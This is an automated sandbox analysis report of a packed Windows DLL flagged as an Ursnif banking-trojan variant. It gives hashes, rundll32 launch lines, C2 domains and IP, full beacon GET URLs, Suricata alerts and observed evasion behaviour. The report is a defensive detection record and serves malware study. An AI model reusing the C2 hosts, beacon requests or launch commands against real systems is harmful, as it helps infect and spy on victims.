Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Aug. 4, 2021, 9:31 a.m.	Aug. 4, 2021, 9:53 a.m.

Size	786.5KB
Type	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
MD5	`2f3c83a9b7d37b99c603a28d09c74cc6`
SHA256	`68ab9c658f136782ec8e341d0ad8257989689882cfc03db4cdf719b3a68c8e85`
CRC32	`486E08CA`
ssdeep	`12288:UQvWGTLtCQBI4/JCx4EVwUsqx8cx6QVMO207bJ9xjYxYW5xrwythebCG6Qdk49ki:RI4/e4Eu/+x6TmKfheO4w`
PDB Path	c:\922\exact-round\Example\horse\in.pdb
Yara	PE_Header_Zero - PE File Signature OS_Processor_Check_Zero - OS Processor Check IsDLL - (no description) UPX_Zero - UPX packed file IsPE32 - (no description) Malicious_Library_Zero - Malicious_Library

rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\app.dll,Chartthird
2776
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\app.dll,Heavybaby
2076
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\app.dll,Right
2936
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\app.dll,
1812

Name	Response	Post-Analysis Lookup
gtr.antoinfer.com	A 185.228.233.17	185.228.233.17
app.bighomegl.at	A 185.228.233.17	185.228.233.17

IP Address	Status	Action
164.124.101.2	Active	Moloch
185.228.233.17	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49209 -> 185.228.233.17:80	2033204	ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49208 -> 185.228.233.17:80	2033203	ET MALWARE Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49208 -> 185.228.233.17:80	2033204	ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49207 -> 185.228.233.17:80	2033203	ET MALWARE Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49207 -> 185.228.233.17:80	2033204	ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49216 -> 185.228.233.17:80	2033203	ET MALWARE Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49216 -> 185.228.233.17:80	2033204	ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49211 -> 185.228.233.17:80	2033203	ET MALWARE Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49210 -> 185.228.233.17:80	2033203	ET MALWARE Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49210 -> 185.228.233.17:80	2033204	ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49212 -> 185.228.233.17:80	2033203	ET MALWARE Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49218 -> 185.228.233.17:80	2033203	ET MALWARE Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49218 -> 185.228.233.17:80	2033204	ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49215 -> 185.228.233.17:80	2033203	ET MALWARE Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49215 -> 185.228.233.17:80	2033204	ET MALWARE Ursnif Variant CnC Beacon - URI Struct M2 (_2F)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49217 -> 185.228.233.17:80	2033203	ET MALWARE Ursnif Variant CnC Beacon - URI Struct M1 (_2B)	Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Queries for the computername (10 events)

Time & API	Arguments	Status	Return
GetComputerNameW Aug. 4, 2021, 9:31 a.m.	computer_name:		0
GetComputerNameW Aug. 4, 2021, 9:31 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 4, 2021, 9:31 a.m.	computer_name:		0
GetComputerNameW Aug. 4, 2021, 9:31 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 4, 2021, 9:31 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 4, 2021, 9:31 a.m.	computer_name:		0
GetComputerNameW Aug. 4, 2021, 9:31 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 4, 2021, 9:31 a.m.	computer_name:		0
GetComputerNameW Aug. 4, 2021, 9:31 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 4, 2021, 9:31 a.m.	computer_name: TEST22-PC	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\InstallDate

This executable has a PDB path (1 event)

pdb_path

c:\922\exact-round\Example\horse\in.pdb

Performs some HTTP requests (8 events)

request	GET http://gtr.antoinfer.com/ilhhkVZtVJpYqpN_2BDOP/NOHLJTIsHn_2Bqpm/LhC0_2BobD4aF4k/aePrgKyX0ZqdTkNB1U/Gyfb0AP_2/BJCao5nvD3BCJMOWv_2F/8lh5d67w2Ox_2Fi9AID/5fdZa6mvv_2Fjc96r_2FuM/e2iaxDWQXiKg1/dLrAkngq/mkQEH5oDsC4lNIJ8wpglr0x/l3zrqOJCoD/tK6zsFOoGoJbKE1GE/TZ29VpTmXuUv/aazx8EUYsNP/g7MxJzr20_2FZ5/NNXfrS4qMD_2BzT61bZwg/B5Ukry2Ow3XgD7FD/lJjlppM0OgSDTB8/fgOuogo7fQ8c92kawd/g
request	GET http://app.bighomegl.at/lBfvYxl5Lshl9at_2FO/RXyfXhebrRaoVwB_2FnLA7/ROc7KuB9J3QSq/1Dr5huVt/SFQ3cZinVB5wJtPwY2gcxsU/Rfwvw986_2/BIr0sztvK8qdsoABe/QUDSbtlCkN_2/F1MKjCx3yoM/8NwL9JT0GI4fXn/YZXLzoYgy4bc1JzqUMlRQ/bEv2_2FvF57IvDFL/05AGNk7WXdTdrmc/rh1jM3tWjnQ_2Fs30X/TDrqYo2Zf/0aqqtLXOpNotSbMzfn0n/FWTI_2BX68Lx9sUiBbN/2VSsBwXA0STqV8064kgA_2/BZGUSSgQStsaV/QOtuP4p_/2BJWyIacZlgDFTvZ1nw1ogV/bC8Sw
request	GET http://app.bighomegl.at/uWEvFb6RfbVReReaEa5z_2F/AYPFSuVCGL/BUr96O06vWM79Tp_2/FFh1vOdPwdTC/h0yJai59TuO/n6bSyUvzZcfY14/B2kuCIra_2B2ccpEshCI_/2B0JgWvBGAM9V59u/QSjBoCRdUyjufXs/_2BuwbUspt5tUlp2wX/D_2F8nrCj/Hj9jlKAVBEcTi5Ix_2Fi/vzo5PxBPbqm3RWtGn3P/gefVzlX7EtGEzG7mpadkfd/3MLXWAIzLDIeu/AlKOxni_/2ButUcbP9uBh3GTD0pgdDfi/Y_2B9LQya8/GCjx2odmZYR_2FdVm/9Op2ntnJJ7AV/tpN7pejv/x
request	GET http://gtr.antoinfer.com/CElNOIv6Dq/1o4yaoj90B_2FOYQk/j_2BOfLBbEYu/Dg_2BYo8RD2/VW58yPHueGQ5rG/Xu1MCjXvALwg3mUEnG5hI/ptpUEQH8ZNM8sTJY/5rMWXDt6O92qkSe/uyxO0XWsWJiDEXwSFn/t2e9Oxnfi/wXpSxp7VYe2ZFmtM938P/jSJM129e_2FrYdtwCJi/JtyhtGqaQMdW4w_2BCmeQW/8lLyrSNoGhhHo/VhQGtN6j/_2B86XMH3MMlbpdOl4nSV1Z/W4NfJE29XL/jpYyaeNs7AfD9KMuB/ji00M8SpkHOo/P374Yj_2BZq/fcXezeIHxJmDH7_2/B
request	GET http://gtr.antoinfer.com/3lxXBVpX/37GSsDJacyaps9UTuAj4dXU/bhJs1AOFEq/v48Fs5fyxtNfSPnvl/GI_2BAaIQ1Td/HLKcBYEwJZ0/zjYZ_2BbcGIz6y/lSSW5zBgIwkHYVcLGVOnG/vuCSAHezIRJ4V8ow/vPs162wVtqxAqrN/yFJnULwSdpzOdZ5asP/fjCO0uwl5/j0BXUOKuRNhtgR_2Bqr2/Dsf8_2F2VwUEDM3ZZAB/6Hjf8SoH_2B0_2BJ3cUtlt/tVaKrbu2ABUd3/LQtxfXkh/mtogAmoKkVJD3k3A4T_2F2w/eS2i_2BNQw/alze_2BQtU8PiyWIb/MShw4aRT5I/p
request	GET http://app.bighomegl.at/2HHWI5LnqgR_2BV/mi5nknbAuhcRKM_2BV/V8mC_2BsB/NolNIFNRaGA1zPdDCTn2/pR1jx5PUmSU7xYBfraW/tIzrh4tzh_2FwuS05hfFYm/u4NKnM_2FflZk/L4vFSglc/8_2BzUXR4_2FpT7_2FQqdRO/Kzomixh0dq/U32GTU1UlVUGxBubq/zEDWT7buQosJ/1WXNlsvDtjB/T4NAmRQjuq_2F9/LIQMElMv3o050p2ZYWB9_/2BiUVa0S90i_2BJH/CA7es6Ste2BF6bt/eudo_2B7u6DSMZ_2F3/zdxRBIoil/Cv73PMdBdEphlbvmWXND/CWiX66C0AjF/HAIp
request	GET http://gtr.antoinfer.com/siE06Vq3G3JE5ObEka0k/tpwdKD_2B3K3GaDDnwk/RbNemIwnYrQzvBRpf15bD5/Z408V5zjfgb2M/ZgJDjcnk/sMVAXyjXUqFReFnLGRvFWZr/e4_2Frdm_2/BWpN5_2BDC9y4fogx/kmMjucyW2OAA/MxohON3Kmgq/RKgNKOwW8WymyS/7UvCoW0NxhlEp41phcEe8/Mls8DN1q99WP1L_2/BoDZxnIqiZBVBum/fB2t2g5WMzBFPBBb61/yuZ3QJYaS/thERMjJwZRQiMezRQ1By/t5ovvExGL4VXh0QtLY9/cYr8RSU8sCVV9PX5JUX0Uw/pHa8qwHU/s72xVKtMolQq/C
request	GET http://gtr.antoinfer.com/1JiyJgiW_2BzuXCBKF/HfwkH43OC/P_2B2ZbYWqUMnJ4eh8oV/lfB5Fep_2BVSFAukmne/822eeAeBOoroCj2RR3_2FI/VSJM9wl266h1n/sEo0nK2I/oKp8oRfjuH9eZaOMAwylLtc/XgXOrJfG6l/c6hoOLP2Bv3ZN3w3b/c5R7Bng5Dn93/QCvHGckIYgu/dHOA2vY4p_2F7u/ezoibGfKXqlgng8DyUBhG/WN0DmTjbiDMhb9E4/t4yOcRaNAhbjdhK/ZjQwNg4KN6JsI7zq7Y/bIflTY_2B/3w0tKs28cEXSzGjB4ZD_/2Fjkap9RkXGFIlOQr16/ucz8o2dCUOW_2F_2F19_2B/9EXN

Allocates read-write-execute memory (usually to unpack itself) (37 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Aug. 4, 2021, 9:31 a.m.	process_identifier: 2776 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73750000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 4, 2021, 9:31 a.m.	process_identifier: 2776 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76891000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 4, 2021, 9:31 a.m.	process_identifier: 2776 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73da1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 4, 2021, 9:31 a.m.	process_identifier: 2776 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d30000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 4, 2021, 9:31 a.m.	process_identifier: 2776 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d11000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 4, 2021, 9:31 a.m.	process_identifier: 2776 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 16384 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x737c2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2021, 9:31 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003b0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2021, 9:31 a.m.	process_identifier: 2776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003d0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2021, 9:31 a.m.	process_identifier: 2776 region_size: 147456 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00820000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 4, 2021, 9:31 a.m.	process_identifier: 2776 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x729d1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 4, 2021, 9:31 a.m.	process_identifier: 2776 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72981000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 4, 2021, 9:31 a.m.	process_identifier: 2776 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72731000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 4, 2021, 9:31 a.m.	process_identifier: 2776 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73321000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 4, 2021, 9:31 a.m.	process_identifier: 2776 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x726e1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 4, 2021, 9:31 a.m.	process_identifier: 2076 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73750000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 4, 2021, 9:31 a.m.	process_identifier: 2076 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76891000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 4, 2021, 9:31 a.m.	process_identifier: 2076 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73da1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 4, 2021, 9:31 a.m.	process_identifier: 2076 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d30000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 4, 2021, 9:31 a.m.	process_identifier: 2076 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d11000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 4, 2021, 9:31 a.m.	process_identifier: 2076 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 16384 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x737c2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2021, 9:31 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2021, 9:31 a.m.	process_identifier: 2076 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003f0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2021, 9:31 a.m.	process_identifier: 2076 region_size: 147456 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 4, 2021, 9:31 a.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73750000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 4, 2021, 9:31 a.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76891000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 4, 2021, 9:31 a.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73da1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 4, 2021, 9:31 a.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d30000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 4, 2021, 9:31 a.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d11000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 4, 2021, 9:31 a.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 16384 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x737c2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2021, 9:31 a.m.	process_identifier: 2936 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002f0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2021, 9:31 a.m.	process_identifier: 2936 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00300000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 4, 2021, 9:31 a.m.	process_identifier: 2936 region_size: 147456 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 4, 2021, 9:31 a.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x729d1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 4, 2021, 9:31 a.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72981000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 4, 2021, 9:31 a.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72731000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 4, 2021, 9:31 a.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73321000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 4, 2021, 9:31 a.m.	process_identifier: 2936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x726e1000 process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (1 event)

description

rundll32.exe tried to sleep 131 seconds, actually delayed analysis time by 131 seconds

File has been identified by 9 AntiVirus engines on VirusTotal as malicious (9 events)

ESET-NOD32	a variant of Generik.EUVXCEM
Paloalto	generic.ml
McAfee-GW-Edition	Artemis!Trojan
Sophos	Mal/Generic-R
Webroot	W32.Trojan.Gen
Microsoft	Program:Win32/Wacapew.C!ml
GData	Win32.Trojan-Spy.Ursnif.YF9M4Q
McAfee	Artemis!2F3C83A9B7D3
Rising	Trojan.Generic@ML.89 (RDML:c+nl9E+GY7UzE5BlqVN+oA)

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation Aug. 4, 2021, 9:31 a.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

app.dll

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All